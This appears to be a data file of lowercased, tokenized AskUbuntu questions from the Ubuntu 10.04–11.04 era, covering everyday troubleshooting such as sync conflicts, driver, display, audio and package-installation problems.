libgnomekbd4 ( > = 2.31.5 ) but it is not going to be installed depends : libgtk2.0-0 ( > = 2.20.0 ) but it is not going to be installed depends : libmetacity-private0 ( > = 1:2.26.0 ) but it is not going to be installed depends : libpango1.0-0 ( > = 1.17 ) but it is not going to be installed depends : librsvg2-2 ( > = 2.26.0 ) but it is not going to be installed depends : libunique-1.0-0 ( > = 1.0.0 ) but it is not going to be installed depends : libxklavier16 ( > = 5.0 ) but it is not going to be installed depends : libxss1 but it is not going to be installed depends : capplets-data ( > = 1:2.32.1-0ubuntu15 ) depends : capplets-data ( < 1:2.33 ) depends : gnome-settings-daemon ( > = 2.30 ) but it is not going to be installed depends : gnome-menus ( > = 2.12.0 ) but it is not going to be installed depends : gnome-icon-theme ( > = 2.24 ) but it is not going to be installed depends : desktop-file-utils but it is not going to be installed depends : gconf2-common ( > = 2.23.2-0ubuntu3 ) but it is not going to be installed depends : ubuntu-system-service ( > = 0.1.10 ) but it is not going to be installed recommends : evolution-data-server but it is not going to be installed recommends : gnome-user-guide but it is not going to be installed recommends : gnome-session but it is not going to be installed recommends : policykit-1-gnome but it is not going to be installed recommends : mousetweaks but it is not going to be installed libaccess-bridge-java : depends : default-jre but it is not going to be installed or openjdk-6-jre but it is not going to be installed or sun-java6-jre but it is not going to be installed recommends : libaccess-bridge-java-jni but it is not going to be installed libglu1-mesa-dev : depends : libgl1-mesa-dev but it is not going to be installed or libgl-dev
56020	is ubuntu one robust enough for serious use ?	first off , this not a whinging moaning message : i 'm interested to see if other people have similar problems to the ones i 've had , and i 'm trying to be constructive . i am comparing u1 with dropbox . i would like to drop the other product due to security issues and problems i have with support , terms of use , etc.. the trouble is dropbox is rather good and well , 'just works' i 've been playing with/testing u1 using 4 machines . in general it works but i have lots of occasional problems . conflicts ... for a file that has n't changed for a few days , i make a change and it becomes a conflict file . why ? all 4 machines where consistent until i edited the file on one machine . files not uploading ... certain files just do n't upload . no clue why . i 've looked at the ini ( ignore_default ) file , and checked the files names to make sure that they do n't match . files/directories disappearing ... could be connected to the conflict problem but whole directory trees just disappear ! i have now started to keep a local copy of everything in the u1 directory , 'just in case ' . this is not optimal . now , because of these problem , i have installed a few tools to help me look at what is going on . could they be making things worse ? magicicana and ubuntuone-indicator . also i have a few shell files to monitor the log . tail -f ~/.cache/ubuntuone/log/syncdaemon.log and the current transfers u1sdtool -- current-transfers sleep 20 u1xfer plus very occasionally when things are looking bad i use the following .. u1sdtool -q find ~/.local/share/ubuntuone/syncdaemon -depth -type d -empty -delete u1sdtool -- start u1sdtool -c although i avoid that and it was not used when the conflict problem ( s ) occurred . i 've not mentioned the windows client . i would like this and i want it to work , but i 've ignored it for now as it 's beta . i have tried it but all these problems occurred without the windows client involved . ultimately a working reliable windows client is a must-have but i know that this is a 'work in progress ' and 'do n't run before you can walk ' applies . any advice or thoughts about my problems would be gratefully received . as a normal user i would have thought that dropbox users are a target audience for u1 and i , for one , would love to stop using dropbox . ( dropbox client is not installed on any of the 4 test machines ) thanks for bearing with me through with this long message ! thank you for your thoughts , i 'm comparing u1 to the more established , sync software out there , dropbox and spideroak ( thanks allan , i had already spotted this , but thanks anyway ) as i said in the post dropbox 'just works ' and with my admittedly brief encounter with spideroak that also 'just works ' . maybe i 'm looking too hard , but for example when a file has been stable for 4 days across all 4 of my test systems ( and on the web site ) , an edit to the file causes a conflict , i just ca n't put that into the 'just works ' category . i 'm trying to discuss the problems with a positive spin , i do n't consider u1 yet to be of 'industrial strength ' but i would like it to be and i would be happy to help in any way i can . there is no point in burying our heads in the sand and repeating the mantra 'ubuntuone is great ' , if it is n't . as an example some people i know , new to this file syncing , just do n't trust it and do n't use it -- bring out the old usb stick is their response . having had this negative attitude now , it will take a lot to bring them around . they had been doing things like editing files in the u1 directory which as you said is asking for problems , but if no-one tells them they 're going to lose faith in the technology , as it does n't seem to work for them .
56022	what to use to quickly cut audio/video	if just need to crop audio/video from a longer track , what can i use ? i tried openshot , but i find the export video slow , perhaps its compling all the `` layers '' into a new movie ? perhaps i just need a simple `` crop '' tool for audio/video will surfice ?
56025	what is the yakuake alternative for unity desktop ?	is there any alternate for yakuake for the unity desktop , when i log in unless i 'm in kde , i cant open yakuake . sudo apt-get install yakuake returns nothing on unity , while on kde it installed perfectly .
56027	how to enter ge'ez alphabet ( tigrinyan language )	ge'ez is an east-african alphabet . using the powerful eclipse ide editor , it is possible to switch `` input type '' to tigrinya ( ez+ ) . typing the 5 letters selam will then result in the 3 ge'ez letters : ሰላም i am looking for a similar feature for openoffice , libreoffice , gedit or gnome in general . i use ubuntu 10.04 lucid .
56029	how to ensure full package install after removing a meta-package ?	suppose i have a meta-package `` m '' that installs a , b , and c. after doing an apt-get install m , i encounter an error during the install of b . in our example b does some compilation stuff . now i want to clean out m , a , b , and c and re-install . what i want is for b to do its compilation stuff as well . what i am seeing , though , is it just goes through the apt-get install routine very quickly , almost like working from a cache . what is the best method to start from scratch after a meta-package uninstall ?
56031	`` line 302 permission denied '' error while installing vmware player	the problem for an operating systems architecture course at university , we are required to use vmware player 3.1.4 for class assignments . i currently run 64-bit ubuntu 11.04 , and have recently formatted with a vanilla install of 64-bit 11.04 ; which still had the following outcome . i start the install off by cd'ing to the directory where the vmware bundle resides and running this installation command : sudo sh ./vmware-player-3.1.4-385536.x86_64.bundle unfortunately , after half of a second of running the install script , i encounter this error : ./vmware-player-3.1.4-385536.x86_64.bundle : line 302 : /tmp/vmis.k6yk9o/install/vmware-installer/vmware-installer : permission denied at which the extracted installer is executed at line 302 with the following options : 302 `` $ installer '' -- set-setting vmware-installer libconf `` $ libconf '' \ 303 -- install-component `` $ source '' /vmware-installer \ 304 -- install-bundle `` $ bundle '' `` $ @ '' also , an md5sum called on the bundle returns the exact sum as mentioned on the download page . a7fdadfb2af8d9f76571cd06f2439041 vmware-player-3.1.4-385536.x86_64.bundle at this point , i 've used sudo -i to log in as root which still throws a permission denied error . searching google and stackoverflow provided only one other case with no answers ( i upvoted ) ; so i decided to post to askubuntu wondering if somebody has had the same issue or has a fix under 11.04 ? cheers ! : p
56035	how does the backup-button works and how can i use this under ubuntu ?	many external hard drives have a backup-button with a otb function for backing up stuff . an example is the `` sharkoon quickstore portable '' . so how does this button works ? is there a vendor neutral standard ? does it need a special driver ? how can i assign a action to this button ? ( for example start the deja-dup backup )
56036	what 's the difference between the `` group '' and `` group- '' file ?	i know what the /etc/group file is for , but i 'm also seeing a /etc/group- file . what 's the difference between the two ? the same group names and ids appear in both files . only the last column ( users ) is different . i 'm running ubuntu 11.04
56037	auto-switch audio to hdmi when hdmi monitor/receiver plugged into laptop	i have a laptop with an hdmi port . while we 're homeless and staying with friends i 've been plugging it into their surround sound receiver with an hdmi cable . to get sound working i have to open up the sound settings jobby and switch the hardware profile from `` analogue stereo output '' to `` digital stereo ( hdmi ) output '' to have sound coming from the surround sound instead of the laptop 's mincey speakers . i have to do the reverse when i unplug it to get sound coming out of the speakers . i 'm getting a little bored of doing this . i 'd like to script this . i have seen this question and its answer but pacmd list-sinks only shows one sink when the sound profile drop down shows several options . and is there a udev event i could hook this into so it can run the script whenever the hdmi status changes ?
56038	photo organization software ?	i take alot of photos , on windows i have used picasa - and sure , it is a wine-based version available for linux . what alternatives are available on ubuntu that can at least handle raw support , organization , editing and uploading to the web ? please include one piece of software per answer including an overview of features and a description of the software
56039	how can i force a usb modem to only connect via edge and not 3g ?	how do i get network-admin to restrict connection to gsm ( edge ) instead of flipping between 3g and edge and lose connection . usually it works out-of-the box , but at my current location there are a lot of radio shadows , so the recommendation from my isp is that i should lock to edge - which can be done using their own driver in windows . how can i do this in ubuntu ubuntu 11.04 modem : huawei e220 isp : telia mobilt bredband kontant
56042	fast psd files preview	i am looking for psd files viewer . gimp is too fat for this job . i need something fast and light .
56045	wireless is disabled by hardware switch	network manager shows the message `` wireless is disabled by hardware switch '' while three is no switch on the laptop to disable wireless . below is the lshw output which might help to get to the solution $ sudo lshw -c network ... *-network disabled description : wireless interface product : centrino advanced-n 6200 vendor : intel corporation physical id : 0 bus info : pci @ 0000:0a:00.0 logical name : wlan0 version : 35 serial : 58:94:6b:14:25 : c8 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=2.6.38-8-generic firmware=9.221.4.1 build 25532 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:41 memory : ead00000-ead01fff
56046	noise after resuming computer from suspend	i hear noise in my speakers and headphones after waking up my pc . to fix this , i have to reload alsa . is there a way to fix , or at least to reload alsa automatic after suspend ? oh i forgot , i 'm running ubuntu 11.04 and my soundcard is creative x-fi extremegamer .
56051	reinstalling ubuntu without formating /home , as well as without any old config files ?	i have /home on a separate partition . i want to reinstall ubuntu . i do n't want to lose my personal files in /home ( i already have a backup but i would like to avoid the hassle of restoring the backup ) . i know how to reinstall ubuntu using an existing /home partition without formatting it , but i do n't want any configuration from previous ubuntu to be in the new install . in other words , i would like a new and fresh install of ubuntu , with my previous personal files in /home but without any configuration file from the previous ubuntu install . is this possible ? how could i accomplish that ? i was thinking about manually deleting all the hidden configuration files in /home ( those starting with a `` dot '' ) from the live cd before starting the installer , but i 'm not sure if the file permissions will allow me to delete those files and i 'm also not sure if that will be enough to not bring any configuration setting from the previous install . i thought it would be good to ask here before trying to do that , for `` safety '' reasons ; )
56055	how can i get both of my monitors working with ubuntu ?	i have two w2252tq flatron screens , both were working in windows 7 prior to installing ubuntu 10.04 . the active monitor is connected via dvi with the vga one dark . if i disconnect the dvi one then the vga monitor becomes the active one . i would like both of them to work . additionally if i check the monitors settings it says `` monitory : unknown '' with the refresh rate at 50hz . however the monitor seem to be working fine at the right resolution . i have activated the additional drivers for my nvidia graphics card although it says `` no proprietary drivers are in use on this system . '' what can i do to make ubuntu handle the second monitor ? .
56056	is there a way to programmatically move and resize gnome windows ?	i 'd like to get some of the functional of xmonad in gnome . is it possible to write a shell script that will resize and position the windows that are open on the gnome desktop ?
56063	screen issues ( image shifted to the right ) with amd radeon hd 6850	since i installed my graphics card - a amd radeon hd 6850 - i could n't get ubuntu to work . i 've just installed ubuntu again but still no success to run it properly . i 've installed using updates and mp3 codecs . when i start ubuntu , i see the monitor is slipped right . how can i solve this issue ?
56064	wo n't decrypt home folder , ubuntu server 11.04	i have a big problem with ubuntu server 11.04 . when i log into the server with ssh or ftp the files in my home folder is encrypted . this happened yesterday too , but a reboot fixed it . i just reinstalled the os on my desktop computer and had a backup on the server , so i need to get hold of the files . the server has only been running for a few days and is set up using software raid1 and has the following installed : apache2 , mysql-server , munin , pure-ftpd and phpmyadmin . i have not messed with any settings related to encryption . the only thing i have changed in terms of users is to add my user to the group www-data . someone here who knows how this can be fixed ?
56067	corrupted partition table in ubuntu natty	i messed around with my partition table a few weeks ago , now i ca n't start up ubuntu , except recovery mode . it gives me an error message in the beginning like /device/sda1 is not ready or not present then it freezes . is there a way to restore it ?
56069	ubuntu install failing- hard drive	trying to dual-boot ubuntu and windows 7 on the same 1tb sata hard drive , but the ubuntu installer wo n't recognize the drive- the live cd will , though , and can see it under gparted , etc . already tried going into bios and changing away from ide . no luck . this is op- i think i was mistaken about what was going wrong . i meant that the installer itself wo n't recognize the hard drive , but when i use ubuntu from the live cd , i 'm able to see the hard drive , edit it with gparted , even open files from the windows partition . but , when the installer gets to the step `` allocate drive space '' , it has nothing there- no devices , no partitions , nothing .
56083	how to set up ssh connection ( acessible over internet , not lan ) using mts mblaze modem ?	i have a mts mblaze usb dongle , with which i can connect to the internet . the question is , how do i set up a ssh connection accessible over the internet so that any one can connect to my pc through that ( using valid username/password provided by me of course ) ? if not possible , what do i need to make this possible ? i 'm using ubuntu 10.04 - but can upgrade if absolutely required .
56084	installing old mysql server 4.1 on ubuntu 11.04	how do i need to install mysql server 4.1 on ubuntu 11.04 server for a legacy app to run ( it breaks on mysql 5 ) . sudo apt-get mysql-server-4.1 does n't work - `` package is missing , obsoleted or available from another source '' . background : i 'm trying to migrate from a windows server to ubuntu server . i have a ms visual foxpro app connecting to mysql server 4.1 on windows . just trying to replicate that on ubuntu for now . so far , i 've got it to the point where the app is already up and running from a remote machine ( on mysql 5.1 ) . however , i have tested and verified that some functions do n't work well and it is because of the difference in mysql versions . invariably , someone would suggest that i tinker with the code . i ca n't do that yet as i did n't develop the app and am still negotiating for the source code . in the meantime , my goal is just to get this thing to run in ubuntu with as little hassle as possible and that requires mysql server 4.1 . thanks .
56085	how can i fix unity top panel color problems with certain themes ?	with the default themes `` new wave , '' and the bisigi themes ( from the ppa ) `` eco , '' `` balanzan , '' and `` wild-shine '' -- light themes with dark window decorations -- the unity panel displays dark text on a dark background . i tried changing the text [ normal ] property as suggested here but from what i can tell that will change the font color elsewhere , as well . how is it that the light themes manage to avoid this problem , but themes that have n't been designed with unity in mind succumb to them ? is there a way to fix this ?
56088	fail to run a .net 2.0 application with mono 2.6.7	update : after installing mono-complete , there are some warnings : $ mono handyoutliner.exe libpng warning : incorrect sbit chunk length ** ( handyoutliner.exe:18066 ) : warning ** : gdipsetpencustomstartcap is n't implemented ** ( handyoutliner.exe:18066 ) : warning ** : gdipsetpencustomendcap is n't implemented also when i try to open the application 's samples/sample_toc_1.txt in the bookmark source box , there is an error reported `` ole32.dll '' , which seems to be missing . i wonder if we can do something to fix them ? original : i am trying to run handyoutlinerfo ( downloadable from http : //handyoutlinerfo.sourceforge.net/ ) on ubuntu 10.10 , but not succeed . i was wondering if there are some suggestions here ? thanks in advance ! the software 's system requirements are : os : win32 nt/xp/7 platform : .net framework 2.0 or above my mono version is $ mono -- version mono jit compiler version 2.6.7 ( debian 2.6.7-3ubuntu1 ) copyright ( c ) 2002-2010 novell , inc and contributors . www.mono-project.com tls : __thread gc : included boehm ( with typed gc and parallel mark ) sigsegv : altstack notifications : epoll architecture : x86 disabled : none the output error of openning the software in mono is $ mono handyoutliner.exe ** ( handyoutliner.exe:12318 ) : warning ** : the following assembly referenced from /home/tim/desktop/handyoutliner_1.1.4.0_bin/handyoutliner.exe could not be loaded : assembly : system.windows.forms ( assemblyref_index=0 ) version : 2.0.0.0 public key : b77a5c561934e089 the assembly was not found in the global assembly cache , a path listed in the mono_path environment variable , or in the location of the executing assembly ( /home/tim/desktop/handyoutliner_1.1.4.0_bin/ ) . ** ( handyoutliner.exe:12318 ) : warning ** : could not load file or assembly 'system.windows.forms , version=2.0.0.0 , culture=neutral , publickeytoken=b77a5c561934e089 ' or one of its dependencies . ** ( handyoutliner.exe:12318 ) : warning ** : missing method enablevisualstyles in assembly /home/tim/desktop/handyoutliner_1.1.4.0_bin/handyoutliner.exe , type system.windows.forms.application unhandled exception : system.io.filenotfoundexception : could not load file or assembly 'system.windows.forms , version=2.0.0.0 , culture=neutral , publickeytoken=b77a5c561934e089 ' or one of its dependencies . file name : 'system.windows.forms , version=2.0.0.0 , culture=neutral , publickeytoken=b77a5c561934e089'
56091	mouting `` t.bin ''	i have this file that i got from a friend who says that its the disk image of an android mobile . doing a file on the image i get the following : - $ file t.bin t.bin : linux rev 0.0 ext2 filesystem data ( mounted or unclean ) , uuid=badcafee-dead-beef-0000-000000000000 so i try to mount this onto a folder in order to see its contents : - $ mkdir testmountpoint $ cd testmountpoint $ sudo mount t.bin testmountpoint/ mount : /home/developer/analysis/data.bin is not a block device ( maybe try `-o loop ' ? ) $ sudo mount -o loop t.bin testmountpoint/ mount : stale nfs file handle how could i go about reading the contents of this disk image ?
56092	how to start sensors-applet	i installed lm-sensors hddtemp sensors-applet . i am able to get output from sensors . but cant find how i can start sensors-applet . i didnt find hardware sensors ( or anything that looks like sensors-applet ) under right click panel > add to panel i am using ubuntu 11.04
56094	middle button on trackpad/point does n't work with gnome 3	i just upgraded my gui from unity to gnome3 . there 's one problem i 'm having , though . pointing devices apparently loses functionality in gnome3 , but i need to be able to use my trackpoint . pointing devices can disable the trackpad fine , and my trackpoint itself works fine , but my middle button does n't work . is there any fix for this ? thanks !
56095	how i do a system restore ?	problem i faced i installed something that crashed my wifi drivers that i compiled earlier . un-installing the same package does n't helped . finally , i re-compiled my wifi drivers and things are good . my question but , is there anything like system restore or system rollback in ubuntu/linuxmint ? is there anything that can undo an apt-get install package command ?
56096	fix mobility radeon graphics in ubuntu 11.04 [ until now ]	is there some things to fix mobility amd radeon hd3xxx series in ubuntu 11.04 ? ? until now , i 've been updated my system using kernel 2.6.39-11 and catalyst 11.7 but graphics effects sill running ugly in ubuntu 11.04 . i 've try to disable `` vsync '' and `` refresh rate '' in ccsm but still ugly . if i using standard driver ( xorg-ati ) my system usually freezes ! ! but if i using catalyst driver , it 's not happen again but have bad performances is there way to fix this ?
56104	how can i install sun/oracle 's proprietary java jdk 6/7/8 or jre ?	i want to install oracle 's jre and to update to the latest version with the software updater when they released . is there a ubuntu package that is provided by canonical or oracle ? before release java 7 , i followed this way to install java 6 . but it does n't work for java 7 . there is no package sun-java7-xxx . how can you install java 7 ?
56107	how to move my trash into /tmp or automatically empty trash on reboot ?	i rarely use trash . ( i use shift+delete ) but recently , i found i often remove some important files by mistake . so i want to use trash now . but as we all know , my limited disk space will be filled with files in trash if i do n't clear the trash by myself . so i have an idea . i want to move my trash into /tmp , so that i wo n't have to clear it myself . i wrote some code into ~/.bash_profile like this : mkdir /tmp/my-trash i made a symbol link pointing to /tmp/my-trash . i removed the directory ~/.local/share/trash/files , and moved my symbol link into ~/.local/share/trash , and renamed it into files . but it does n't work ! i put some files into /tmp/my-trash , clicked the trash icon in the lower right corner . but there is nothing . i chose a file and pressed delete , but it said that it can not move the file into trash and asked me to permanent remove the file .
56116	wireless network not connecting in kubuntu 11.04	i 've got a fairly fresh install ( a month old ) of kubuntu without much modification done to it and i 'm having massive issues connecting to any wireless network . the computer can see the networks available and on trying to connect to my home network it will get to setting network address before waiting for a while and then cutting the connection . sometimes the connection works , most of the time it does n't . i 've got this script which sometimes helps , but sometimes does n't : sudo ifconfig wlan0 down sudo dhclient -r wlan0 sudo ifconfig wlan0 up sudo dhclient wlan0 i do n't really know too much about how to troubleshoot this issue ( i 'm a bit of a *ubuntu noob ) - can anyone help ? here 's my wifi card info : description : wireless interface product : centrino advanced-n 6205 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 34 serial : a0:88 : b4:58 : d1 : c4 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=2.6.38-10-generic firmware=17.168.5.2 build 35905 ip=192.168.2.53 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:48 memory : f2500000-f2501fff
56120	is it possible to use three monitors on my system ?	i am using the latest ubuntu 11.04 . my computer is lenovo thinkcenter m series . i am now using dual monitors . i am wondering whether i could use three monitors on my system ? thanks anand
56122	problems with microsoft wireless keyboard 5000	i have this keyboard , and i installed ubuntu 11.04 without configure my keyboard correctly . now , every time i turn on my computer i have to change it the layout from `` usa '' to `` brazil '' : i tried to remoging the `` usa '' from list and click `` apply-system-wide ... '' , but after restart the layout always return to usa . any idea to keep the layout in `` brazil '' ?
56125	what do you do , if a system update breaks your ubuntu graphics ? ( is there a sandbox ? )	i did an x.org update on ubuntu , and that landed me with some graphics problem and ultimately into shell . is there something like sandbox on which you could try out something and rollback if not liked ? please help.. !
56126	are wine-based and mono-based programs started differently ?	i was wondering if wine-based and mono-based programs are started differently ? for wine-based , i go through gnome gui , clicking applications - > wine - > programs - > . how can i call it from terminal ? for mono-based , i use terminal , where i type mono path-to-program . can i call it from gnome gui ? thanks !
56128	how can i actually change my `` power management '' settings ?	i go into settings - > power management , trying to change the `` put display to sleep when inactive for : '' and `` dim display when idle '' settings . the changed settings are saved -- if i come back to the same menu , they appear as i left them . but when i watch a full screen video , the display does get dim every once in a while . and if i leave my laptop alone for 15 minutes , the screen does go black ( and lock itself ) . how can i actually change these settings ? i would also want to stop it from locking itself every time it went inactive -- just blank the screen .
56137	why unity will not find my folder ?	i have a folder in my /home/me/ directory called `` podcast '' , and when i click on unity 's left menu `` files & folders '' and type `` podcast '' in the search , it shows nothing . also , if i select to search `` folders '' instead of `` all files '' it still finds nothing . why it does n't work ? is it only with me ?
56138	in the terminal , how can i repeat a command multiple times on different files ?	in the terminal , i want to use ffmpeg2theora to convert all the .mov files in a certain directory to .ogv files . however , the following does not work : ffmpeg2theora *.mov is there a good way to repeat a command multiple times on different files ? thanks !
56141	programs shut down immediately after opening	i am having a problem where some programs , including software center , update manager , and synaptic all close down immediately after opening . the window comes up , but disappears before i have a chance to do anything . people with similar problems have submitted bug reports with similar errors , but none seem to apply directly to my situation . when i run the software center from a terminal , i get the following script . i appreciate any help . weston [ sudo ] password for wes : 2011-08-07 10:41:38,788 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/share/software-center/softwarecenter/db/database.py ' , 154 , 'open ' ) ' 2011-08-07 10:41:38,788 - root - warning - failed to add sca db could n't stat '/root/.cache/software-center/software-center-agent.db ' ( no such file or directory ) /usr/share/software-center/softwarecenter/app.py:1192 : warning : g_object_set_qdata : assertion `g_is_object ( object ) ' failed self.window_main.show_all ( ) 2011-08-07 10:41:39,873 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/pymodules/python2.7/zeitgeist/client.py ' , 367 , 'reconnect_monitors ' ) ' 2011-08-07 10:41:39,872 - zeitgeist.client - info - reconnected to zeitgeist engine ... /usr/share/software-center/softwarecenter/simplegtkbuilderapp.py:50 : warning : g_object_set_qdata : assertion `g_is_object ( object ) ' failed gtk.main ( ) 2011-08-07 10:41:44,253 - softwarecenter.backend.scagent - warning - error in query_info 'operation not supported' 2011-08-07 10:41:44,254 - softwarecenter.db.update - warning - error : operation not supported
56144	how to reset all themes	my themes have gotten pretty messed up ( installed different icon sets and controls etc , made custom themes combining different elements ) is there an easy way to just remove all the custom themes and return to the original set of themes ( and icons , controls etc ) ? it would really help ! thanks
56145	ca n't connect to remote desktop from windows	i 'm having trouble with the remote desktop server that comes with ubuntu . i 've changed to settings to `` allow other users to view '' and `` allow other users to control '' and i set `` require users to enter this password : ** '' . and i 've turned off the confirmation for each access . when i try to connect from another machine ( namely a windows machine ) i get `` this computer ca n't connect to the remote computer '' . i 've set this up before on a different ubuntu box with the same settings without trouble . the remote desktop computer has other ports open , like ssh and ftp that work fine . and i did not have to configure the firewall for those applications . is there something else i might be missing ? something i should try and determine the issue ? thanks .
56155	how can i change brightness through terminal	now i can change it by fn+ arrow right but now i need to do it via my shell script
56159	phpmyadmin installation throws an 'ca n't connect to local mysql server through socket ' w/ mysql 5.5	each time i try to install phpmyadmin , i get an error error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) each time phpmyadmin tries to `` configure '' dbconfig-common , i have to input mysql-admin pwd and i do it , but it always fails and asks me if i 'd like to perty or ignore . i can access mysql ( mysql -u root -p ) works well . by doing sudo /etc/init.d/mysql restart i get following output : root @ hp-pavilion-dv7 : /home/ < username > # /etc/init.d/mysql restart shutting down mysql .. * starting mysql .. * and the same by doing sudo service mysql start p.s . i decided to use mysql 5.5 so i first installed mysql 5.5 ( quide ) and then apache2 , php and so on ( sudo aptitude install apache2 apache2-mpm-prefork php5 php5-cli php5-mysql libapache2-mod-php5 php5-mcrypt php5-curl php5-gd phpmyadmin ) any suggestions ?
56167	clock displays incorrect time	i 've just installed 64-bit ubuntu 11.04 and after i updated it , the clock stopped displaying the right time . it 's now 8 hours behind my normal time . i 've checked the time and date settings and the location field is correct . what 's even weirder is that the time displayed in time and date settings adjusts itself after a few seconds and is correct . the time displayed in the task bar remains the same , however . any ideas ?
56169	how can i recover endpoint encryption bootloader ?	i have a bit of a problem . i have a win 7 partition encrypted with mcafee endpoint encryption . i used to boot with mee , but grub replaced that bootloader . i made the huge mistake of not making a backup of the mbr : ( . now i can load ubuntu , but when i try to load the win7 partition the following message is shown : `` missing operating system ... '' is there any way to recover my encrypted partition data ( i have the username and password ) ? or is there a way to recover the mee bootloader ?
56170	unity hotkey for minimizing current window ?	what are the hotkeys for switching the current window between maximized , normal , and minimized states ? if some of these do n't exist , can i set them somewhere ?
56174	install ubuntu 10.10 server from usb ( with grub4dos )	i have had no problem installing ubuntu desktop when i boot off a live usb , but the server version has given me some trouble . i think it has to do with the way grub handles drivers . when the server install tries to look from the cd it ca n't find it . i use the following to load it : find -- set-root /iso/ubuntu-10.10-server-i386.iso map /iso/ubuntu-10.10-server-i386.iso ( 0xff ) map -- hook root ( 0xff ) kernel /install/vmlinuz file=/cdrom/preseed/ubuntu-server.seed boot=install iso-scan/filename=/iso/ubuntu-10.10-server-i386.iso splash initrd /install/initrd.gz is there any way to pass the location of the iso to ubuntu ? edit : grub4dos is run from the usb , not the hd .
56181	xampp vs . native lamp packages	i 'm currently in the process of setting up an ubuntu desktop setup for a combination of technical writing , heavy statistics/mathematical analysis , and also server-side development and i wanted to know whether i should just download and install apache , mysql , and all my other technologies as the native packages , or if using xampp is a good idea . the reason i ask is because while i 'm used to xampp on my windows system , when it comes to doing server work on cent os , i 've always just had that setup as a dedicated server machine . from my experience , i 've found that with cent os , i do n't feel constrained with the configurations , compared to xampp which seems to be more of a `` hand holding '' quick deploy & test kit . with ubuntu however as i 'm running the desktop version ( mainly because i 've had bad experiences running the ubuntu web server edition ) i 'm not sure if i should use xampp for my test server , or if i could install everything natively so i maintain more control . thanks very much in advance for any insights ,
56183	wired network does not connect on first boot	i am having a problem with one of my desktop computers not connecting to the wired network when i first turn it on in the morning . after a restart , the wired network works fine . any suggestions i could try to get this working ? thanks !
56184	wifi networking freezes then unfreezes	i have a mac mini ( os x lion ) and a thinkpad running ubuntu 11.04 . when i log into the same server from both computer via ssh , the connection the thinkpad is extremely slow compared to the ssh connection on my mac mini . it even hangs and freezes , while the mini does not . they are both on the same wifi local network . any suggestions on how i can diagnose the problem on the ubuntu thinkpad ? it seems that the ssh session starts to hang or freeze when i stop typing in it for a few seconds . edit . ok it seems that my whole network connectivity freezes for seconds at a time , so i ca n't hit the network for anything . the it starts working again . if i run ping yahoo.com , it pings yahoo repeatedly . but every few minutes it just freezes for 10 or more seconds . then it starts pinging again , without registering any abnormal ping interval . during the hang nothing that hits the network responds : web browser , curl , etc .
56187	built an iso with remastersys but it does n't boot ?	i have installed remsatersys back-up from the interwebs , so i could have a custom iso . per the instructions on many how to i chose the option backup on the menu . however when i reboot my pc to try the iso , grub shows up but regardless of what option i pick it always gives this error : error 15 : file not found press any key to continue ... i have absolutely no idea what is it ? what is missing ? . edit : i was missing initrd.lzbut now i get this error : starting up ... fatal : could not load /lib/modules/3.0.1.030001-generic/modules.dep no such file or directory busybox v1.17.1 ( ubuntu 1:1.17.1-10ubuntu1 ) built-in shell ( ash ) enter `help` for a list of built-in commands ( initramfs ) unable to find a medium containing a live file system _ edit , again : i 've given up on remastersys , what other options do i have ? that do n't involve manually extracting the filesystem ? or uck ? .
56191	where are the entries of the 2nd monitor panel stored	i have an external monitor on my laptop , with multi screen setup . often i put custom application launchers on the external monitor panel , only then to need them , when the monitor is not connected . where can i find them ?
56194	is setting a `` master password '' essential for security of thunderbird accounts ?	on a single user machine with full disk encryption , is there a security advantage to using thunderbird 's master password , or is it safe to leave it disabled ? without enabling the master password , could something like surfing the web potentially reveal the passwords for the e-mail accounts in thunderbird ? or is master password intended more as a protection for accounts on a multi-user computer ?
56197	how to add various artists media to amarok music collection ?	i 've recently started to use amarok , it went smoothly for a while but now for some reason the collection 's completely messed up . it seems that various artists albums are ignored or partly shown . tags are ok and consistent as far as i can tell . i tried to import from file and move to collection but amarok split my albums in many folders , sorted per artists ( the nightmare ! ! ! ) so how can i get amarok to simply read what 's in my music folder and how can i prevent it from changing my files ? as i see it the program should adapt to my music , not the other way around . thanks for the help .
56202	how to get compiz visual effects at startup	compiz visual was working perfectly just days ago after a restart ( no update nothing ) it stopped working at startup , i have to run `` compiz -- replace '' for it to work again and get recognized i would like to have my compiz visual affects to work spontaneously on startup running ubuntu 11.04 thanks
56205	i already have a natty-desktop-amd64.iso downloaded and on my system . how can i tell vmbuilder to use it ?	i already have a natty-desktop-amd64.iso downloaded and on my system . how can i tell vmbuilder to use it ? vmbuilder seems to be using wget to download debs itself . is there a way to get it to use debs out of an iso ? maybe a loopback mounted iso ? update : i 'm running natty .
56206	how do i provide wired connections with internet while leeching off of a wireless network ?	i want to connect a desktop pc to my laptop and use the wireless ability of my laptop to give my desktop internet .
56209	automatically rsync when hotplugging a sata drive ( bay not esata )	to keep up on my backups i want to run a specific rsync command when i insert a specific sata hard drive ( s ) into any or all of my hotswap bays . would this be done using uuids somehow to keep track of the drives ? whenever i search i find udev for usb drives , can this work here as well ?
